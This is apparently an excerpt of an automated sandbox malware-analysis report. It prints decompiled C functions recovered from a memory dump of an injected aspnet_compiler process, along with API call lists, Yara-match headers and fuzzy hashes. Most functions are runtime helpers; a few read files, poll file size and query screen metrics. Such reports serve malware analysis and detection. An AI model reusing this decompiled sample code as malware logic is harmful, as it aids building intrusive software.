                    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                    						L11:
                    						__eflags = _t142 & 0x80000000;
                    						if((_t142 & 0x80000000) != 0) {
                    							 *_t184 = 0x2d;
                    							_t184 = _t184 + 1;
                    							__eflags = _t184;
                    						}
                    						__eflags = _a28;
                    						_v16 = 0x3ff;
                    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                    						__eflags = _t172[1] & 0x7ff00000;
                    						_v32 = _t136;
                    						_t86 = 0x30;
                    						if((_t172[1] & 0x7ff00000) != 0) {
                    							 *_t184 = 0x31;
                    							_t185 = _t184 + 1;
                    							__eflags = _t185;
                    						} else {
                    							 *_t184 = _t86;
                    							_t185 = _t184 + 1;
                    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                    							__eflags = _t164;
                    							if(_t164 != 0) {
                    								_v16 = 0x3fe;
                    							} else {
                    								_v16 = _v16 & _t164;
                    							}
                    						}
                    						_t146 = _t185;
                    						_t186 = _t185 + 1;
                    						_v28 = _t146;
                    						__eflags = _t181;
                    						if(_t181 != 0) {
                    							_t30 = _v48 + 0x88; // 0xff1875ff
                    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                    						} else {
                    							 *_t146 = 0;
                    						}
                    						_t92 = _t172[1] & 0x000fffff;
                    						__eflags = _t92;
                    						_v20 = _t92;
                    						if(_t92 > 0) {
                    							L23:
                    							_t33 =  &_v8;
                    							 *_t33 = _v8 & 0x00000000;
                    							__eflags =  *_t33;
                    							_t147 = 0xf0000;
                    							_t93 = 0x30;
                    							_v12 = _t93;
                    							_v20 = 0xf0000;
                    							do {
                    								__eflags = _t181;
                    								if(_t181 <= 0) {
                    									break;
                    								}
                    								_t119 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    								_t161 = 0x30;
                    								_t121 = _t119 + _t161 & 0x0000ffff;
                    								__eflags = _t121 - 0x39;
                    								if(_t121 > 0x39) {
                    									_t121 = _t121 + _t136;
                    									__eflags = _t121;
                    								}
                    								_t162 = _v20;
                    								_t172 = _a4;
                    								 *_t186 = _t121;
                    								_t186 = _t186 + 1;
                    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                    								_t147 = _t162 >> 4;
                    								_t93 = _v12 - 4;
                    								_t181 = _t181 - 1;
                    								_v20 = _t162 >> 4;
                    								_v12 = _t93;
                    								__eflags = _t93;
                    							} while (_t93 >= 0);
                    							__eflags = _t93;
                    							if(_t93 < 0) {
                    								goto L39;
                    							}
                    							_t115 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    							__eflags = _t115 - 8;
                    							if(_t115 <= 8) {
                    								goto L39;
                    							}
                    							_t54 = _t186 - 1; // 0xff8bc35f
                    							_t116 = _t54;
                    							_t138 = 0x30;
                    							while(1) {
                    								_t156 =  *_t116;
                    								__eflags = _t156 - 0x66;
                    								if(_t156 == 0x66) {
                    									goto L33;
                    								}
                    								__eflags = _t156 - 0x46;
                    								if(_t156 != 0x46) {
                    									_t139 = _v32;
                    									__eflags = _t116 - _v28;
                    									if(_t116 == _v28) {
                    										_t57 = _t116 - 1;
                    										 *_t57 =  *(_t116 - 1) + 1;
                    										__eflags =  *_t57;
                    									} else {
                    										_t157 =  *_t116;
                    										__eflags = _t157 - 0x39;
                    										if(_t157 != 0x39) {
                    											 *_t116 = _t157 + 1;
                    										} else {
                    											 *_t116 = _t139 + 0x3a;
                    										}
                    									}
                    									goto L39;
                    								}
                    								L33:
                    								 *_t116 = _t138;
                    								_t116 = _t116 - 1;
                    							}
                    						} else {
                    							__eflags =  *_t172;
                    							if( *_t172 <= 0) {
                    								L39:
                    								__eflags = _t181;
                    								if(_t181 > 0) {
                    									_push(_t181);
                    									_t111 = 0x30;
                    									_push(_t111);
                    									_push(_t186);
                    									E00435760(_t181);
                    									_t186 = _t186 + _t181;
                    									__eflags = _t186;
                    								}
                    								_t94 = _v28;
                    								__eflags =  *_t94;
                    								if( *_t94 == 0) {
                    									_t186 = _t94;
                    								}
                    								__eflags = _a28;
                    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								_t174 = _a4[1];
                    								_t100 = E00456060( *_a4, 0x34, _t174);
                    								_t137 = 0;
                    								_t151 = (_t100 & 0x000007ff) - _v16;
                    								__eflags = _t151;
                    								asm("sbb ebx, ebx");
                    								if(__eflags < 0) {
                    									L47:
                    									 *(_t186 + 1) = 0x2d;
                    									_t187 = _t186 + 2;
                    									__eflags = _t187;
                    									_t151 =  ~_t151;
                    									asm("adc ebx, 0x0");
                    									_t137 =  ~_t137;
                    									goto L48;
                    								} else {
                    									if(__eflags > 0) {
                    										L46:
                    										 *(_t186 + 1) = 0x2b;
                    										_t187 = _t186 + 2;
                    										L48:
                    										_t182 = _t187;
                    										_t101 = 0x30;
                    										 *_t187 = _t101;
                    										__eflags = _t137;
                    										if(__eflags < 0) {
                    											L56:
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L60:
                    												_push(0);
                    												_push(0xa);
                    												_push(_t137);
                    												_push(_t151);
                    												_t102 = E00455D60();
                    												_v32 = _t174;
                    												 *_t187 = _t102 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												L61:
                    												_t104 = 0x30;
                    												_t183 = 0;
                    												__eflags = 0;
                    												 *_t187 = _t151 + _t104;
                    												 *(_t187 + 1) = 0;
                    												goto L62;
                    											}
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L61;
                    											}
                    											if(__eflags > 0) {
                    												goto L60;
                    											}
                    											__eflags = _t151 - 0xa;
                    											if(_t151 < 0xa) {
                    												goto L61;
                    											}
                    											goto L60;
                    										}
                    										if(__eflags > 0) {
                    											L51:
                    											_push(0);
                    											_push(0x3e8);
                    											_push(_t137);
                    											_push(_t151);
                    											_t107 = E00455D60();
                    											_v32 = _t174;
                    											 *_t187 = _t107 + 0x30;
                    											_t187 = _t187 + 1;
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L55:
                    												_push(0);
                    												_push(0x64);
                    												_push(_t137);
                    												_push(_t151);
                    												_t109 = E00455D60();
                    												_v32 = _t174;
                    												 *_t187 = _t109 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												goto L56;
                    											}
                    											L52:
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L56;
                    											}
                    											if(__eflags > 0) {
                    												goto L55;
                    											}
                    											__eflags = _t151 - 0x64;
                    											if(_t151 < 0x64) {
                    												goto L56;
                    											}
                    											goto L55;
                    										}
                    										__eflags = _t151 - 0x3e8;
                    										if(_t151 < 0x3e8) {
                    											goto L52;
                    										}
                    										goto L51;
                    									}
                    									__eflags = _t151;
                    									if(_t151 < 0) {
                    										goto L47;
                    									}
                    									goto L46;
                    								}
                    							}
                    							goto L23;
                    						}
                    					}
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L11;
                    					} else {
                    						_t183 = E00448B87(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                    						__eflags = _t183;
                    						if(_t183 == 0) {
                    							_t128 = E00456140(_t184, 0x65);
                    							_pop(_t166);
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								__eflags = _a28;
                    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								__eflags = _t170;
                    								 *_t128 = _t170;
                    								 *((char*)(_t128 + 3)) = 0;
                    							}
                    							_t183 = 0;
                    						} else {
                    							 *_t184 = 0;
                    						}
                    						goto L62;
                    					}
                    				} else {
                    					_t129 = E0043EEAD();
                    					_t183 = 0x22;
                    					 *_t129 = _t183;
                    					E0043A5BB();
                    					L62:
                    					if(_v40 != 0) {
                    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                    					}
                    					return _t183;
                    				}
                    			}


                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                    • Instruction ID: 2e0d047c9ab5e1f9e195ebe2db35710396bb8e1c860b674ed94f75fdd8067eee
                    • Opcode Fuzzy Hash: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                    • Instruction Fuzzy Hash: 26A138B19006869FFB21CF18C8917BEBBA1EF15314F18416FE885AB381CA7C9946C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004410D1(void* _a4, intOrPtr* _a8) {
                    				char _v5;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _t44;
                    				char _t47;
                    				intOrPtr _t50;
                    				signed int _t52;
                    				signed int _t56;
                    				signed int _t57;
                    				void* _t59;
                    				signed int _t63;
                    				signed int _t65;
                    				char _t67;
                    				intOrPtr* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t75;
                    				void* _t76;
                    				void* _t77;
                    				signed int _t80;
                    				intOrPtr _t82;
                    				void* _t86;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t91;
                    				intOrPtr* _t98;
                    				void* _t101;
                    				intOrPtr _t102;
                    				intOrPtr _t103;
                    
                    				_t101 = _a4;
                    				if(_t101 != 0) {
                    					_t80 = 9;
                    					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                    					_t98 = _a8;
                    					__eflags = _t98;
                    					if(_t98 != 0) {
                    						_t82 =  *((intOrPtr*)(_t98 + 4));
                    						_t47 =  *_t98;
                    						_v16 = _t47;
                    						_v12 = _t82;
                    						__eflags = _t82 - 0xffffffff;
                    						if(__eflags > 0) {
                    							L7:
                    							_t89 = 7;
                    							__eflags = _t82 - _t89;
                    							if(__eflags < 0) {
                    								L12:
                    								_v5 = 0;
                    								_t50 = E0044121E(_t82, __eflags,  &_v16,  &_v5);
                    								_t75 = _v16;
                    								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                    								_t52 = E00455E40(_t75, _v12, 0x15180, 0);
                    								 *(_t101 + 0x1c) = _t52;
                    								_t86 = 0x45d2a0;
                    								_t76 = _t75 - _t52 * 0x15180;
                    								asm("sbb eax, edx");
                    								__eflags = _v5;
                    								if(_v5 == 0) {
                    									_t86 = 0x45d26c;
                    								}
                    								_t91 =  *(_t101 + 0x1c);
                    								_t56 = 1;
                    								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                    								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                    									L16:
                    									_t57 = _t56 - 1;
                    									 *(_t101 + 0x10) = _t57;
                    									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                    									_t59 = E00455E40( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                    									_t87 = 7;
                    									asm("cdq");
                    									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                    									_t63 = E00455E40(_t76, _v12, 0xe10, 0);
                    									 *(_t101 + 8) = _t63;
                    									_t77 = _t76 - _t63 * 0xe10;
                    									asm("sbb edi, edx");
                    									_t65 = E00455E40(_t77, _v12, 0x3c, 0);
                    									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                    									 *(_t101 + 4) = _t65;
                    									_t67 = 0;
                    									__eflags = 0;
                    									 *_t101 = _t77 - _t65 * 0x3c;
                    									L17:
                    									return _t67;
                    								} else {
                    									do {
                    										_t56 = _t56 + 1;
                    										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                    									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                    									goto L16;
                    								}
                    							}
                    							if(__eflags > 0) {
                    								L10:
                    								_t68 = E0043EEAD();
                    								_t102 = 0x16;
                    								 *_t68 = _t102;
                    								L11:
                    								_t67 = _t102;
                    								goto L17;
                    							}
                    							__eflags = _t47 - 0x934126cf;
                    							if(__eflags <= 0) {
                    								goto L12;
                    							}
                    							goto L10;
                    						}
                    						if(__eflags < 0) {
                    							goto L10;
                    						}
                    						__eflags = _t47 - 0xffff5740;
                    						if(_t47 < 0xffff5740) {
                    							goto L10;
                    						}
                    						goto L7;
                    					}
                    					_t69 = E0043EEAD();
                    					_t102 = 0x16;
                    					 *_t69 = _t102;
                    					E0043A5BB();
                    					goto L11;
                    				}
                    				_t71 = E0043EEAD();
                    				_t103 = 0x16;
                    				 *_t71 = _t103;
                    				E0043A5BB();
                    				return _t103;
                    			}


                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                    • Instruction ID: 551359a9c080faf0a086328dfaf192d0d3c69e8e99468298c70d0e4e8f2cce1c
                    • Opcode Fuzzy Hash: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                    • Instruction Fuzzy Hash: 47413A71A00704EFE7249F79CC42BAA7BA9EB8C714F10462FF101DB291D779A9818784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00442303(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				short** _t16;
                    				char* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x4704e4; // 0xecda90
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E004443F4(_t13, _t11, 1);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E00445002(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0044E33F();
                    									E00445002(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}












                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                    • Instruction ID: 928698612f51615fe1cf777c5292d1b4e42623037d2c96bc68a693b0eec0e686
                    • Opcode Fuzzy Hash: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                    • Instruction Fuzzy Hash: 3F01A7B26096167EFA201E797DC1F6B221DDF917B9B70033BF921612D5DBAC8C014168
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00442382(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				char** _t16;
                    				short* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x4704e0; // 0xec46b8
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E004443F4(_t13, _t11, 2);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E00445002(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0044E34A(_t13);
                    									E00445002(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}












                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                    • Instruction ID: ffef20b579aa455cdcb3ec38d6af2d4eff98cb77a0cb65f0443bbc9c4ef6001c
                    • Opcode Fuzzy Hash: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                    • Instruction Fuzzy Hash: 5101D6B22096127FF6211E797CC1D2B232DEF513BA365033BF921512D5DAACCC444168
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00409BE8(void* __ecx, char* __edx) {
                    				void* __ebx;
                    				int _t9;
                    				long _t14;
                    				char* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t30;
                    
                    				_t22 = __edx;
                    				_t9 =  *0x4730e8 |  *0x4730ec;
                    				_t24 = __ecx;
                    				if(_t9 != 0) {
                    					 *((char*)(__ecx + 0x39)) = 0;
                    					do {
                    						_t9 = CreateFileW(E00401EE4(0x4730a0), 0x80000000, 7, 0, 3, 0x80, 0);
                    						_t23 = _t9;
                    						if(_t23 == 0xffffffff) {
                    							 *((char*)(_t24 + 0x39)) = 0;
                    						} else {
                    							_t14 = GetFileSize(_t23, 0);
                    							_t30 = 0 -  *0x4730ec;
                    							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x4730e8)) {
                    								 *((char*)(_t24 + 0x39)) = 1;
                    								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                    									E0040A64F(0, _t24, _t22);
                    								}
                    								Sleep(0x2710);
                    							}
                    							_t9 = CloseHandle(_t23);
                    						}
                    					} while ( *((char*)(_t24 + 0x39)) == 1);
                    					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                    						_t35 =  *0x46f9d4 - 0x31;
                    						if( *0x46f9d4 == 0x31) {
                    							E004086D0(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                    							return E0040977E(_t24, _t22);
                    						}
                    					}
                    				}
                    				return _t9;
                    			}












                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                    • Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                    • CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID:
                    • API String ID: 1958988193-0
                    • Opcode ID: 5ad1ed3af5bed69a5ff6478d2e9d3a9c5653c6e737b1b91eeee8138e63c319b1
                    • Instruction ID: 776417b5dd6b277b78666ee6a0049f3b3f0777a2ef627118506dbb8d74d8395d
                    • Opcode Fuzzy Hash: 5ad1ed3af5bed69a5ff6478d2e9d3a9c5653c6e737b1b91eeee8138e63c319b1
                    • Instruction Fuzzy Hash: 2C11EB306487C07AF721AB34A8C9A2F3ADEA745705F04447FF187661D3C6799D84831D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00446DE6(signed int _a4) {
                    				signed int _t9;
                    				void* _t13;
                    				signed int _t15;
                    				WCHAR* _t22;
                    				signed int _t24;
                    				signed int* _t25;
                    				void* _t27;
                    
                    				_t9 = _a4;
                    				_t25 = 0x470668 + _t9 * 4;
                    				_t24 =  *_t25;
                    				if(_t24 == 0) {
                    					_t22 =  *(0x45cc40 + _t9 * 4);
                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                    					if(_t27 != 0) {
                    						L8:
                    						 *_t25 = _t27;
                    						if( *_t25 != 0) {
                    							FreeLibrary(_t27);
                    						}
                    						_t13 = _t27;
                    						L11:
                    						return _t13;
                    					}
                    					_t15 = GetLastError();
                    					if(_t15 != 0x57) {
                    						_t27 = 0;
                    					} else {
                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                    						_t27 = _t15;
                    					}
                    					if(_t27 != 0) {
                    						goto L8;
                    					} else {
                    						 *_t25 = _t15 | 0xffffffff;
                    						_t13 = 0;
                    						goto L11;
                    					}
                    				}
                    				_t4 = _t24 + 1; // 0x54ba778f
                    				asm("sbb eax, eax");
                    				return  ~_t4 & _t24;
                    			}











                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue), ref: 00446E18
                    • GetLastError.KERNEL32(?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000,00000364,?,00446B67), ref: 00446E24
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000), ref: 00446E32
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                    • Instruction ID: 7cfac10879522bcf09d0363c87617103b1842d1ca64a55dff1d48b8732c2297d
                    • Opcode Fuzzy Hash: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                    • Instruction Fuzzy Hash: 7901F73A2063229BD7214B79EC44A573BD9AF06F62B320231F91AD7241D724D801C6ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041ADFE(void* __edx) {
                    				long _v12;
                    				void* __ebx;
                    				void* __ecx;
                    				void* __edi;
                    				void* __ebp;
                    				struct _OVERLAPPED* _t12;
                    				WCHAR* _t13;
                    				void* _t17;
                    				long _t19;
                    				void* _t21;
                    
                    				_t12 = 0;
                    				_t21 = __edx;
                    				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
                    				if(_t17 != 0xffffffff) {
                    					_t19 = GetFileSize(_t17, 0);
                    					E0040242E(0, _t21, _t17, _t21, _t19, 0);
                    					_v12 = 0;
                    					if(ReadFile(_t17, E00401F8B(_t21), _t19,  &_v12, 0) != 0) {
                    						_t12 = 1;
                    					}
                    					CloseHandle(_t17);
                    					return _t12;
                    				}
                    				return 0;
                    			}














                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041AE2B
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041AE50
                    • CloseHandle.KERNEL32(00000000), ref: 0041AE5E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                    • Instruction ID: 3f0c34db4874b28da9e92ecf7e139d0848c3339cd4cea530d57336cc45ca2017
                    • Opcode Fuzzy Hash: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                    • Instruction Fuzzy Hash: 1BF0C2B52462087FE6111B21BC84FBF379CDB867A9F10067EFD02A22C1CA658D054536
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 19%
                    			E00438160(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t25;
                    				void* _t27;
                    				void* _t28;
                    				void* _t29;
                    				intOrPtr _t30;
                    				intOrPtr* _t32;
                    				void* _t34;
                    
                    				_t29 = __edx;
                    				_t27 = __ebx;
                    				_t36 = _a28;
                    				_t30 = _a8;
                    				if(_a28 != 0) {
                    					_push(_a28);
                    					_push(_a24);
                    					_push(_t30);
                    					_push(_a4);
                    					E004387AF(_t36);
                    					_t34 = _t34 + 0x10;
                    				}
                    				_t37 = _a40;
                    				_push(_a4);
                    				if(_a40 != 0) {
                    					_push(_a40);
                    				} else {
                    					_push(_t30);
                    				}
                    				E00437C87(_t28);
                    				_t32 = _a32;
                    				_push( *_t32);
                    				_push(_a20);
                    				_push(_a16);
                    				_push(_t30);
                    				E004389B1(_t27, _t28, _t29, _t30, _t37);
                    				_push(0x100);
                    				_push(_a36);
                    				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                    				_push( *((intOrPtr*)(_a24 + 0xc)));
                    				_push(_a20);
                    				_push(_a12);
                    				_push(_t30);
                    				_push(_a4);
                    				_t25 = E00437F6A(_t29, _t32, _t37);
                    				if(_t25 != 0) {
                    					E00437C55(_t25, _t30);
                    					return _t25;
                    				}
                    				return _t25;
                    			}














                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00438177
                      • Part of subcall function 004387AF: ___AdjustPointer.LIBCMT ref: 004387F9
                    • _UnwindNestedFrames.LIBCMT ref: 0043818E
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004381A0
                    • CallCatchBlock.LIBVCRUNTIME ref: 004381C4
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                    • Instruction ID: b80c8dfee50a01e3efcc98067a7db4f6d443bb63a6d24abc5b8fd2fcc045c81f
                    • Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                    • Instruction Fuzzy Hash: F1011732000209BBCF125F56CC01EEB7BBAFF4C714F14511AF95866220D73AE8629BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00417F42(intOrPtr _a4, intOrPtr _a8) {
                    				int _v4;
                    				void* __ecx;
                    				int _t9;
                    				void* _t13;
                    				int _t26;
                    				int _t29;
                    
                    				_t9 = GetSystemMetrics(0x4c);
                    				_t26 = GetSystemMetrics(0x4d);
                    				_t29 = GetSystemMetrics(0x4e);
                    				_v4 = GetSystemMetrics(0x4f);
                    				if(_t9 < 0) {
                    					_a4 = _a4 + E00417482();
                    				}
                    				if(_t26 < 0) {
                    					_a8 = _a8 + E00417482();
                    				}
                    				_t13 = E00417FA9(_a4, _t29);
                    				E00417FA9(_a8, _v4);
                    				return _t13;
                    			}










                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
